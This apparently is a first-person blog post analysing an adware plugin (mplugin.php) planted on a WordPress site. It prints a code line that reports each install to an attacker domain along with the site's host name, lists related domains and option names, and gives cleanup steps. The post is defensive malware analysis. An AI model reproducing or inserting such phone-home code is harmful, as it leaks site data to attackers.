Malware on WordPress (Beware)
Just few minutes ago receive a WhatsApp message from one of my friends regard to WordPress being acting weird in past few days… After do initial dive into the site, I found few files that created recently with name as;
- mplugin.php
- admin_ips.txt
At first, the files seem legit as plugins files and as you can see in the image above the plugins have some basic info such normal other WordPress plugins. Going through with the files found some suspicious piece of code, one of them is this one;
if(get_option('log_install') !=='1'){if(!$log_installed = @file_get_contents("http://www.yomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"])){$log_installed = @file_get_contents_mplugin("http://www.yomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);}
as you can see above, it such weird when sending the installation status of the plugins to unknown website with the domain; “yomndo.com”. And it sends the “$_SERVER[“HTTP_HOST”]” for what reasons?…
Okay next, let’s look to this one;
This piece of code actually create the files that I mention above which is, “admin_ips.txt” this files actually store all the Public IP that use by admin to login into their WordPress site.
After i goo deeper into this one files, I found that this code actually design to add the adware kind of malware into the victim WordPress site. And the adware should hide when the IP address is known (admin IP address listed on the files).
Here also I listed few domain related to this attack, as per my checking done, these domains is still live and still keeping the data, so you should check your WordPress site now, if any related to this domain in your WordPress plugins/themes or any user that register using this domain.
yomndo.com
yomndo.top
yomndo.xyzwomndo.com
zrilns.pw
About the weird things happen i mention just now is my friend keep complaining about the unknown user keep register on his website, and he totally doesn't know the user and when delete the user it will keep register using the same domain, the method of injection this malware I’m still not sure but i think it related to vulnerabilities to the themes / plugins that may not update that the attacker use as the way to exploit and inject these code.
How to clear this Malware?..
I think it straight forward, just find those files i listed above and remove from your files, also look to the files that newly created in less than a week, and check the files it is exist for plugins or should not, make sure to back up your WordPress first then delete those files,
For your database, I think you can find the new item created in the tables, and here is the list I get from the code;
add_action( 'admin_init', function() {register_setting( 'mplugin-settings', 'default_mont_options' );register_setting( 'mplugin-settings', 'ad_code' );register_setting( 'mplugin-settings', 'hide_admin' );register_setting( 'mplugin-settings', 'hide_logged_in' );register_setting( 'mplugin-settings', 'display_ad' );register_setting( 'mplugin-settings', 'search_engines' );register_setting( 'mplugin-settings', 'auto_update' );register_setting( 'mplugin-settings', 'ip_admin');register_setting( 'mplugin-settings', 'cookies_admin' );register_setting( 'mplugin-settings', 'logged_admin' );register_setting( 'mplugin-settings', 'log_install' );
As what i understand this item is stored under the “wp_options” table, you can just find this item name and delete it one by one.
Alright that is, this is actually my first post here. Later will add more topic if i found it interesting. Byee guyys. Hope this useful to those WordPress user.
